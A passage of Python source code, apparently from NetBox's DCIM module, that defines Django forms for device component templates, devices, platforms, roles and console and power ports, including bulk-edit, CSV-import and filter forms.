        widget=StaticSelect2()
    )
    mgmt_only = forms.NullBooleanField(
        required=False,
        widget=BulkEditNullBooleanSelect,
        label='Management only'
    )
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('label', 'description')
class FrontPortTemplateForm(BootstrapMixin, forms.ModelForm):
    """Form for editing a single FrontPortTemplate; rear_port choices are scoped to the parent device type."""
    class Meta:
        model = FrontPortTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'rear_port', 'rear_port_position', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
            'rear_port': StaticSelect2(),
        }
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Limit rear_port choices to current DeviceType
        if hasattr(self.instance, 'device_type'):
            self.fields['rear_port'].queryset = RearPortTemplate.objects.filter(
                device_type=self.instance.device_type
            )
class FrontPortTemplateCreateForm(ComponentTemplateCreateForm):
    """Form for creating FrontPortTemplates, each mapped to an unoccupied (rear port, position) pair."""
    type = forms.ChoiceField(
        choices=PortTypeChoices,
        widget=StaticSelect2()
    )
    # Choices are "rear_port_pk:position" strings, populated in __init__
    rear_port_set = forms.MultipleChoiceField(
        choices=[],
        label='Rear ports',
        help_text='Select one rear port assignment for each front port being created.',
    )
    field_order = (
        'manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'rear_port_set', 'description',
    )
    def __init__(self, *args, **kwargs):
        """Populate rear_port_set with the unoccupied rear port positions of the parent DeviceType."""
        super().__init__(*args, **kwargs)
        device_type = DeviceType.objects.get(
            pk=self.initial.get('device_type') or self.data.get('device_type')
        )
        # Determine which rear port positions are occupied. These will be excluded from the list of available mappings.
        occupied_port_positions = [
            (front_port.rear_port_id, front_port.rear_port_position)
            for front_port in device_type.frontporttemplates.all()
        ]
        # Populate rear port choices
        choices = []
        rear_ports = RearPortTemplate.objects.filter(device_type=device_type)
        for rear_port in rear_ports:
            for i in range(1, rear_port.positions + 1):
                if (rear_port.pk, i) not in occupied_port_positions:
                    choices.append(
                        ('{}:{}'.format(rear_port.pk, i), '{}:{}'.format(rear_port.name, i))
                    )
        self.fields['rear_port_set'].choices = choices
    def clean(self):
        super().clean()
        # Validate that the number of ports being created equals the number of selected (rear port, position) tuples
        front_port_count = len(self.cleaned_data['name_pattern'])
        rear_port_count = len(self.cleaned_data['rear_port_set'])
        if front_port_count != rear_port_count:
            raise forms.ValidationError({
                'rear_port_set': 'The provided name pattern will create {} ports, however {} rear port assignments '
                                 'were selected. These counts must match.'.format(front_port_count, rear_port_count)
            })
    def get_iterative_data(self, iteration):
        """Return the rear port mapping for the iteration-th front port being created."""
        # Assign rear port and position from selected set
        rear_port, position = self.cleaned_data['rear_port_set'][iteration].split(':')
        return {
            'rear_port': int(rear_port),
            'rear_port_position': int(position),
        }
class FrontPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """Bulk-edit form for FrontPortTemplates."""
    # Hidden field carrying the set of selected FrontPortTemplate PKs
    pk = forms.ModelMultipleChoiceField(
        queryset=FrontPortTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(PortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('description',)
class RearPortTemplateForm(BootstrapMixin, forms.ModelForm):
    """Form for editing a single RearPortTemplate; the parent device type is fixed."""
    class Meta:
        model = RearPortTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'positions', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
            'type': StaticSelect2(),
        }
class RearPortTemplateCreateForm(ComponentTemplateCreateForm):
    """Form for creating one or more RearPortTemplates from a name pattern."""
    type = forms.ChoiceField(
        choices=PortTypeChoices,
        widget=StaticSelect2(),
    )
    positions = forms.IntegerField(
        min_value=REARPORT_POSITIONS_MIN,
        max_value=REARPORT_POSITIONS_MAX,
        initial=1,
        help_text='The number of front ports which may be mapped to each rear port'
    )
    field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'positions', 'description')
class RearPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """Bulk-edit form for RearPortTemplates."""
    # Hidden field carrying the set of selected RearPortTemplate PKs
    pk = forms.ModelMultipleChoiceField(
        queryset=RearPortTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(PortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('description',)
class DeviceBayTemplateForm(BootstrapMixin, forms.ModelForm):
    """Form for editing a single DeviceBayTemplate; the parent device type is fixed."""
    class Meta:
        model = DeviceBayTemplate
        fields = [
            'device_type', 'name', 'label', 'description',
        ]
        widgets = {
            'device_type': forms.HiddenInput(),
        }
class DeviceBayTemplateCreateForm(ComponentTemplateCreateForm):
    """Form for creating one or more DeviceBayTemplates from a name pattern."""
    field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'description')
class DeviceBayTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
    """Bulk-edit form for DeviceBayTemplates."""
    # Hidden field carrying the set of selected DeviceBayTemplate PKs
    pk = forms.ModelMultipleChoiceField(
        queryset=DeviceBayTemplate.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    label = forms.CharField(
        max_length=64,
        required=False
    )
    description = forms.CharField(
        required=False
    )
    class Meta:
        nullable_fields = ('label', 'description')
#
# Component template import forms
#
class ComponentTemplateImportForm(BootstrapMixin, forms.ModelForm):
    """
    Base form for importing device component templates. The parent DeviceType is injected into the
    submitted data, and fields referencing other components are constrained to that DeviceType.
    """
    def __init__(self, device_type, data=None, *args, **kwargs):
        # Must pass the parent DeviceType on form initialization.
        # Fix: guard against data=None (the declared default) so instantiation without data
        # doesn't crash on the update() call below.
        if data is None:
            data = {}
        data.update({
            'device_type': device_type.pk,
        })
        super().__init__(data, *args, **kwargs)
    def clean_device_type(self):
        data = self.cleaned_data['device_type']
        # Limit fields referencing other components to the parent DeviceType
        for field_name, field in self.fields.items():
            if isinstance(field, forms.ModelChoiceField) and field_name != 'device_type':
                field.queryset = field.queryset.filter(device_type=data)
        return data
class ConsolePortTemplateImportForm(ComponentTemplateImportForm):
    """Bulk-import form for ConsolePortTemplates."""
    class Meta:
        model = ConsolePortTemplate
        fields = [
            'device_type', 'name', 'label', 'type',
        ]
class ConsoleServerPortTemplateImportForm(ComponentTemplateImportForm):
    """Bulk-import form for ConsoleServerPortTemplates."""
    class Meta:
        model = ConsoleServerPortTemplate
        fields = [
            'device_type', 'name', 'label', 'type',
        ]
class PowerPortTemplateImportForm(ComponentTemplateImportForm):
    """Bulk-import form for PowerPortTemplates."""
    class Meta:
        model = PowerPortTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw',
        ]
class PowerOutletTemplateImportForm(ComponentTemplateImportForm):
    """Bulk-import form for PowerOutletTemplates."""
    # Referenced by name; the base class narrows this queryset to the parent DeviceType
    power_port = forms.ModelChoiceField(
        queryset=PowerPortTemplate.objects.all(),
        to_field_name='name',
        required=False
    )

    class Meta:
        model = PowerOutletTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'power_port', 'feed_leg',
        ]
class InterfaceTemplateImportForm(ComponentTemplateImportForm):
    """Bulk-import form for InterfaceTemplates."""
    type = forms.ChoiceField(
        choices=InterfaceTypeChoices.CHOICES
    )

    class Meta:
        model = InterfaceTemplate
        fields = [
            'device_type', 'name', 'label', 'type', 'mgmt_only',
        ]
class FrontPortTemplateImportForm(ComponentTemplateImportForm):
    """Bulk-import form for FrontPortTemplates."""
    type = forms.ChoiceField(
        choices=PortTypeChoices.CHOICES
    )
    # Referenced by name; the base class narrows this queryset to the parent DeviceType
    rear_port = forms.ModelChoiceField(
        queryset=RearPortTemplate.objects.all(),
        to_field_name='name',
        required=False
    )

    class Meta:
        model = FrontPortTemplate
        fields = [
            # 'label' added for parity with the other component-template import
            # forms; without it the label column was silently dropped on import.
            'device_type', 'name', 'label', 'type', 'rear_port', 'rear_port_position',
        ]
class RearPortTemplateImportForm(ComponentTemplateImportForm):
    """Bulk-import form for RearPortTemplates."""
    type = forms.ChoiceField(
        choices=PortTypeChoices.CHOICES
    )

    class Meta:
        model = RearPortTemplate
        fields = [
            # 'label' added for parity with the other component-template import
            # forms; without it the label column was silently dropped on import.
            'device_type', 'name', 'label', 'type', 'positions',
        ]
class DeviceBayTemplateImportForm(ComponentTemplateImportForm):
    """Bulk-import form for DeviceBayTemplates."""
    class Meta:
        model = DeviceBayTemplate
        fields = [
            # 'label' added for parity with the other component-template import
            # forms (DeviceBayTemplateForm exposes a label field as well).
            'device_type', 'name', 'label',
        ]
#
# Device roles
#
class DeviceRoleForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for DeviceRoles."""
    slug = SlugField()

    class Meta:
        model = DeviceRole
        fields = [
            'name', 'slug', 'color', 'vm_role', 'description',
        ]
class DeviceRoleCSVForm(CSVModelForm):
    """CSV import form for DeviceRoles."""
    slug = SlugField()

    class Meta:
        model = DeviceRole
        fields = DeviceRole.csv_headers
        help_texts = {
            'color': mark_safe('RGB color in hexadecimal (e.g. <code>00ff00</code>)'),
        }
#
# Platforms
#
class PlatformForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for Platforms."""
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False
    )
    slug = SlugField(
        max_length=64
    )

    class Meta:
        model = Platform
        fields = [
            'name', 'slug', 'manufacturer', 'napalm_driver', 'napalm_args', 'description',
        ]
        widgets = {
            'napalm_args': SmallTextarea(),
        }
class PlatformCSVForm(CSVModelForm):
    """CSV import form for Platforms."""
    slug = SlugField()
    manufacturer = CSVModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Limit platform assignments to this manufacturer'
    )

    class Meta:
        model = Platform
        fields = Platform.csv_headers
#
# Devices
#
class DeviceForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
    """
    Create/edit form for Devices.

    Placement fields (region/site/rack group/rack/position) and cluster fields
    chain onto each other via dynamic query/initial params; __init__ further
    constrains primary-IP, position, platform, and rack choices based on the
    instance being edited.
    """
    # Region is not stored on Device; it only filters the site choices
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        query_params={
            'region_id': '$region'
        }
    )
    # Rack group is not stored on Device; it only filters the rack choices
    rack_group = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        display_field='display_name',
        query_params={
            'site_id': '$site'
        },
        initial_params={
            'racks': '$rack'
        }
    )
    rack = DynamicModelChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        display_field='display_name',
        query_params={
            'site_id': '$site',
            'group_id': '$rack_group',
        }
    )
    position = forms.IntegerField(
        required=False,
        help_text="The lowest-numbered unit occupied by the device",
        widget=APISelect(
            api_url='/api/dcim/racks/{{rack}}/elevation/',
            attrs={
                'disabled-indicator': 'device',
                'data-query-param-face': "[\"$face\"]",
            }
        )
    )
    # Manufacturer is not stored on Device; it only filters the device-type choices
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False,
        initial_params={
            'device_types': '$device_type'
        }
    )
    device_type = DynamicModelChoiceField(
        queryset=DeviceType.objects.all(),
        display_field='model',
        query_params={
            'manufacturer_id': '$manufacturer'
        }
    )
    device_role = DynamicModelChoiceField(
        queryset=DeviceRole.objects.all()
    )
    platform = DynamicModelChoiceField(
        queryset=Platform.objects.all(),
        required=False,
        query_params={
            # Include platforms with no manufacturer as well as the matching one
            'manufacturer_id': ['$manufacturer', 'null']
        }
    )
    # Cluster group is not stored on Device; it only filters the cluster choices
    cluster_group = DynamicModelChoiceField(
        queryset=ClusterGroup.objects.all(),
        required=False,
        null_option='None',
        initial_params={
            'clusters': '$cluster'
        }
    )
    cluster = DynamicModelChoiceField(
        queryset=Cluster.objects.all(),
        required=False,
        query_params={
            'group_id': '$cluster_group'
        }
    )
    comments = CommentField()
    local_context_data = JSONField(
        required=False,
        label=''
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = Device
        fields = [
            'name', 'device_role', 'device_type', 'serial', 'asset_tag', 'site', 'rack', 'position', 'face',
            'status', 'platform', 'primary_ip4', 'primary_ip6', 'cluster_group', 'cluster', 'tenant_group', 'tenant',
            'comments', 'tags', 'local_context_data'
        ]
        help_texts = {
            'device_role': "The function this device serves",
            'serial': "Chassis serial number",
            'local_context_data': "Local config context data overwrites all source contexts in the final rendered "
                                  "config context",
        }
        widgets = {
            'face': StaticSelect2(),
            'status': StaticSelect2(),
            'primary_ip4': StaticSelect2(),
            'primary_ip6': StaticSelect2(),
        }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        if self.instance.pk:

            # Compile list of choices for primary IPv4 and IPv6 addresses
            for family in [4, 6]:
                ip_choices = [(None, '---------')]

                # Gather PKs of all interfaces belonging to this Device or a peer VirtualChassis member
                interface_ids = self.instance.vc_interfaces.values_list('pk', flat=True)

                # Collect interface IPs
                interface_ips = IPAddress.objects.filter(
                    address__family=family,
                    assigned_object_type=ContentType.objects.get_for_model(Interface),
                    assigned_object_id__in=interface_ids
                ).prefetch_related('assigned_object')
                if interface_ips:
                    ip_list = [(ip.id, f'{ip.address} ({ip.assigned_object})') for ip in interface_ips]
                    ip_choices.append(('Interface IPs', ip_list))
                # Collect NAT IPs
                nat_ips = IPAddress.objects.prefetch_related('nat_inside').filter(
                    address__family=family,
                    nat_inside__assigned_object_type=ContentType.objects.get_for_model(Interface),
                    nat_inside__assigned_object_id__in=interface_ids
                ).prefetch_related('assigned_object')
                if nat_ips:
                    ip_list = [(ip.id, f'{ip.address} (NAT)') for ip in nat_ips]
                    ip_choices.append(('NAT IPs', ip_list))
                self.fields['primary_ip{}'.format(family)].choices = ip_choices

            # If editing an existing device, exclude it from the list of occupied rack units. This ensures that a device
            # can be flipped from one face to another.
            self.fields['position'].widget.add_query_param('exclude', self.instance.pk)

            # Limit platform by manufacturer
            self.fields['platform'].queryset = Platform.objects.filter(
                Q(manufacturer__isnull=True) | Q(manufacturer=self.instance.device_type.manufacturer)
            )

            # Disable rack assignment if this is a child device installed in a parent device
            if self.instance.device_type.is_child_device and hasattr(self.instance, 'parent_bay'):
                self.fields['site'].disabled = True
                self.fields['rack'].disabled = True
                self.initial['site'] = self.instance.parent_bay.device.site_id
                self.initial['rack'] = self.instance.parent_bay.device.rack_id

        else:

            # An object that doesn't exist yet can't have any IPs assigned to it
            self.fields['primary_ip4'].choices = []
            self.fields['primary_ip4'].widget.attrs['readonly'] = True
            self.fields['primary_ip6'].choices = []
            self.fields['primary_ip6'].widget.attrs['readonly'] = True

        # Rack position
        position = self.data.get('position') or self.initial.get('position')
        if position:
            self.fields['position'].widget.choices = [(position, f'U{position}')]
class BaseDeviceCSVForm(CustomFieldModelCSVForm):
    """
    Common fields and validation shared by the Device CSV import forms.
    Subclasses add placement-specific columns (rack vs. parent device bay).
    """
    device_role = CSVModelChoiceField(
        queryset=DeviceRole.objects.all(),
        to_field_name='name',
        help_text='Assigned role'
    )
    tenant = CSVModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Assigned tenant'
    )
    manufacturer = CSVModelChoiceField(
        queryset=Manufacturer.objects.all(),
        to_field_name='name',
        help_text='Device type manufacturer'
    )
    device_type = CSVModelChoiceField(
        queryset=DeviceType.objects.all(),
        to_field_name='model',
        help_text='Device type model'
    )
    platform = CSVModelChoiceField(
        queryset=Platform.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Assigned platform'
    )
    status = CSVChoiceField(
        choices=DeviceStatusChoices,
        help_text='Operational status'
    )
    cluster = CSVModelChoiceField(
        queryset=Cluster.objects.all(),
        to_field_name='name',
        required=False,
        help_text='Virtualization cluster'
    )

    class Meta:
        fields = []
        model = Device

    def __init__(self, data=None, *args, **kwargs):
        super().__init__(data, *args, **kwargs)

        if data:
            # Narrow device_type choices to the manufacturer named in the row
            lookup = "manufacturer__{}".format(self.fields['manufacturer'].to_field_name)
            device_type_field = self.fields['device_type']
            device_type_field.queryset = device_type_field.queryset.filter(
                **{lookup: data.get('manufacturer')}
            )
class DeviceCSVForm(BaseDeviceCSVForm):
    """CSV import form for rack-mounted (non-child) Devices."""
    site = CSVModelChoiceField(
        queryset=Site.objects.all(),
        to_field_name='name',
        help_text='Assigned site'
    )
    rack_group = CSVModelChoiceField(
        queryset=RackGroup.objects.all(),
        to_field_name='name',
        required=False,
        help_text="Rack's group (if any)"
    )
    rack = CSVModelChoiceField(
        queryset=Rack.objects.all(),
        to_field_name='name',
        required=False,
        help_text="Assigned rack"
    )
    face = CSVChoiceField(
        choices=DeviceFaceChoices,
        required=False,
        help_text='Mounted rack face'
    )

    class Meta(BaseDeviceCSVForm.Meta):
        fields = [
            'name', 'device_role', 'tenant', 'manufacturer', 'device_type', 'platform', 'serial', 'asset_tag', 'status',
            'site', 'rack_group', 'rack', 'position', 'face', 'cluster', 'comments',
        ]

    def __init__(self, data=None, *args, **kwargs):
        super().__init__(data, *args, **kwargs)

        if data:
            site_lookup = "site__{}".format(self.fields['site'].to_field_name)
            group_lookup = "group__{}".format(self.fields['rack_group'].to_field_name)

            # Rack groups must belong to the site named in the row
            rack_group_field = self.fields['rack_group']
            rack_group_field.queryset = rack_group_field.queryset.filter(
                **{site_lookup: data.get('site')}
            )

            # Racks must belong to both the named site and the named rack group
            rack_field = self.fields['rack']
            rack_field.queryset = rack_field.queryset.filter(**{
                site_lookup: data.get('site'),
                group_lookup: data.get('rack_group'),
            })
class ChildDeviceCSVForm(BaseDeviceCSVForm):
    """CSV import form for child Devices installed in a parent's device bay."""
    parent = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name',
        help_text='Parent device'
    )
    device_bay = CSVModelChoiceField(
        queryset=DeviceBay.objects.all(),
        to_field_name='name',
        help_text='Device bay in which this device is installed'
    )

    class Meta(BaseDeviceCSVForm.Meta):
        fields = [
            'name', 'device_role', 'tenant', 'manufacturer', 'device_type', 'platform', 'serial', 'asset_tag', 'status',
            'parent', 'device_bay', 'cluster', 'comments',
        ]

    def __init__(self, data=None, *args, **kwargs):
        super().__init__(data, *args, **kwargs)

        if data:
            # Offer only device bays that exist on the parent named in the row
            parent_lookup = "device__{}".format(self.fields['parent'].to_field_name)
            bay_field = self.fields['device_bay']
            bay_field.queryset = bay_field.queryset.filter(**{parent_lookup: data.get('parent')})

    def clean(self):
        super().clean()

        device_bay = self.cleaned_data.get('device_bay')
        parent = self.cleaned_data.get('parent')

        # Set parent_bay reverse relationship
        if device_bay:
            self.instance.parent_bay = device_bay

        # A child device is always located wherever its parent is
        if parent:
            self.instance.site = parent.site
            self.instance.rack = parent.rack
class DeviceBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """Bulk-edit form for Devices."""
    pk = forms.ModelMultipleChoiceField(
        queryset=Device.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    # Manufacturer is not stored on Device; it only filters the device-type choices
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False
    )
    device_type = DynamicModelChoiceField(
        queryset=DeviceType.objects.all(),
        required=False,
        display_field='model',
        query_params={
            'manufacturer_id': '$manufacturer'
        }
    )
    device_role = DynamicModelChoiceField(
        queryset=DeviceRole.objects.all(),
        required=False
    )
    tenant = DynamicModelChoiceField(
        queryset=Tenant.objects.all(),
        required=False
    )
    platform = DynamicModelChoiceField(
        queryset=Platform.objects.all(),
        required=False
    )
    status = forms.ChoiceField(
        choices=add_blank_choice(DeviceStatusChoices),
        required=False,
        widget=StaticSelect2()
    )
    serial = forms.CharField(
        max_length=50,
        required=False,
        label='Serial Number'
    )

    class Meta:
        nullable_fields = [
            'tenant', 'platform', 'serial',
        ]
class DeviceFilterForm(BootstrapMixin, LocalConfigContextFilterForm, TenancyFilterForm, CustomFieldFilterForm):
    """Filter (search sidebar) form for the Device list view."""
    model = Device
    field_order = [
        'q', 'region', 'site', 'rack_group_id', 'rack_id', 'status', 'role', 'tenant_group', 'tenant',
        'manufacturer_id', 'device_type_id', 'mac_address', 'has_primary_ip',
    ]
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    rack_group_id = DynamicModelMultipleChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        label='Rack group',
        query_params={
            'site': '$site'
        }
    )
    rack_id = DynamicModelMultipleChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        label='Rack',
        null_option='None',
        query_params={
            'site': '$site',
            'group_id': '$rack_group_id',
        }
    )
    role = DynamicModelMultipleChoiceField(
        queryset=DeviceRole.objects.all(),
        to_field_name='slug',
        required=False
    )
    manufacturer = DynamicModelMultipleChoiceField(
        queryset=Manufacturer.objects.all(),
        to_field_name='slug',
        required=False,
        label='Manufacturer'
    )
    device_type_id = DynamicModelMultipleChoiceField(
        queryset=DeviceType.objects.all(),
        required=False,
        label='Model',
        display_field='model',
        query_params={
            'manufacturer': '$manufacturer'
        }
    )
    platform = DynamicModelMultipleChoiceField(
        queryset=Platform.objects.all(),
        to_field_name='slug',
        required=False,
        null_option='None'
    )
    status = forms.MultipleChoiceField(
        choices=DeviceStatusChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    mac_address = forms.CharField(
        required=False,
        label='MAC address'
    )
    has_primary_ip = forms.NullBooleanField(
        required=False,
        label='Has a primary IP',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    virtual_chassis_member = forms.NullBooleanField(
        required=False,
        label='Virtual chassis member',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    # The remaining NullBoolean filters test for the presence of each component type
    console_ports = forms.NullBooleanField(
        required=False,
        label='Has console ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    console_server_ports = forms.NullBooleanField(
        required=False,
        label='Has console server ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    power_ports = forms.NullBooleanField(
        required=False,
        label='Has power ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    power_outlets = forms.NullBooleanField(
        required=False,
        label='Has power outlets',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    interfaces = forms.NullBooleanField(
        required=False,
        label='Has interfaces',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    pass_through_ports = forms.NullBooleanField(
        required=False,
        label='Has pass-through ports',
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    tag = TagFilterField(model)
#
# Device components
#
class ComponentCreateForm(ComponentForm):
    """
    Base form for the creation of device components (models subclassed from ComponentModel).
    """
    # Parent device for the component(s) being created
    device = DynamicModelChoiceField(
        queryset=Device.objects.all(),
        display_field='display_name'
    )
    description = forms.CharField(
        max_length=100,
        required=False
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
class DeviceBulkAddComponentForm(ComponentForm):
    """Base form for adding a component to multiple selected Devices at once."""
    pk = forms.ModelMultipleChoiceField(
        queryset=Device.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    description = forms.CharField(
        max_length=100,
        required=False
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
#
# Console ports
#
class ConsolePortFilterForm(DeviceComponentFilterForm):
    """Filter form for the ConsolePort list view."""
    model = ConsolePort
    type = forms.MultipleChoiceField(
        choices=ConsolePortTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    tag = TagFilterField(model)
class ConsolePortForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single ConsolePort."""
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = ConsolePort
        fields = [
            'device', 'name', 'label', 'type', 'description', 'tags',
        ]
        widgets = {
            # Parent device is fixed by the view; never user-editable here
            'device': forms.HiddenInput(),
        }
class ConsolePortCreateForm(ComponentCreateForm):
    """Creation form for ConsolePorts (supports name/label patterns)."""
    type = forms.ChoiceField(
        choices=add_blank_choice(ConsolePortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsolePortBulkCreateForm(
    form_from_model(ConsolePort, ['type']),
    DeviceBulkAddComponentForm
):
    """Form for adding ConsolePorts to multiple Devices at once."""
    field_order = ('name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsolePortBulkEditForm(
    form_from_model(ConsolePort, ['label', 'type', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk-edit form for ConsolePorts."""
    pk = forms.ModelMultipleChoiceField(
        queryset=ConsolePort.objects.all(),
        widget=forms.MultipleHiddenInput()
    )

    class Meta:
        nullable_fields = ('label', 'description')
class ConsolePortCSVForm(CSVModelForm):
    """CSV import form for ConsolePorts."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )

    class Meta:
        model = ConsolePort
        fields = ConsolePort.csv_headers
#
# Console server ports
#
class ConsoleServerPortFilterForm(DeviceComponentFilterForm):
    """Filter form for the ConsoleServerPort list view."""
    model = ConsoleServerPort
    type = forms.MultipleChoiceField(
        choices=ConsolePortTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    tag = TagFilterField(model)
class ConsoleServerPortForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single ConsoleServerPort."""
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = ConsoleServerPort
        fields = [
            'device', 'name', 'label', 'type', 'description', 'tags',
        ]
        widgets = {
            # Parent device is fixed by the view; never user-editable here
            'device': forms.HiddenInput(),
        }
class ConsoleServerPortCreateForm(ComponentCreateForm):
    """Creation form for ConsoleServerPorts (supports name/label patterns)."""
    type = forms.ChoiceField(
        choices=add_blank_choice(ConsolePortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsoleServerPortBulkCreateForm(
    form_from_model(ConsoleServerPort, ['type']),
    DeviceBulkAddComponentForm
):
    """Form for adding ConsoleServerPorts to multiple Devices at once."""
    field_order = ('name_pattern', 'label_pattern', 'type', 'description', 'tags')
class ConsoleServerPortBulkEditForm(
    form_from_model(ConsoleServerPort, ['label', 'type', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk-edit form for ConsoleServerPorts."""
    pk = forms.ModelMultipleChoiceField(
        queryset=ConsoleServerPort.objects.all(),
        widget=forms.MultipleHiddenInput()
    )

    class Meta:
        nullable_fields = ('label', 'description')
class ConsoleServerPortCSVForm(CSVModelForm):
    """CSV import form for ConsoleServerPorts."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )

    class Meta:
        model = ConsoleServerPort
        fields = ConsoleServerPort.csv_headers
#
# Power ports
#
class PowerPortFilterForm(DeviceComponentFilterForm):
    """Filter form for the PowerPort list view."""
    model = PowerPort
    type = forms.MultipleChoiceField(
        choices=PowerPortTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    tag = TagFilterField(model)
class PowerPortForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single PowerPort."""
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = PowerPort
        fields = [
            'device', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw', 'description', 'tags',
        ]
        widgets = {
            # Parent device is fixed by the view; never user-editable here
            'device': forms.HiddenInput(),
        }
class PowerPortCreateForm(ComponentCreateForm):
    """Creation form for PowerPorts (supports name/label patterns)."""
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerPortTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    maximum_draw = forms.IntegerField(
        min_value=1,
        required=False,
        help_text="Maximum draw in watts"
    )
    allocated_draw = forms.IntegerField(
        min_value=1,
        required=False,
        help_text="Allocated draw in watts"
    )
    field_order = (
        'device', 'name_pattern', 'label_pattern', 'type', 'maximum_draw', 'allocated_draw', 'description', 'tags',
    )
class PowerPortBulkCreateForm(
    form_from_model(PowerPort, ['type', 'maximum_draw', 'allocated_draw']),
    DeviceBulkAddComponentForm
):
    """Form for adding PowerPorts to multiple Devices at once."""
    field_order = ('name_pattern', 'label_pattern', 'type', 'maximum_draw', 'allocated_draw', 'description', 'tags')
class PowerPortBulkEditForm(
    form_from_model(PowerPort, ['label', 'type', 'maximum_draw', 'allocated_draw', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk-edit form for PowerPorts."""
    pk = forms.ModelMultipleChoiceField(
        queryset=PowerPort.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
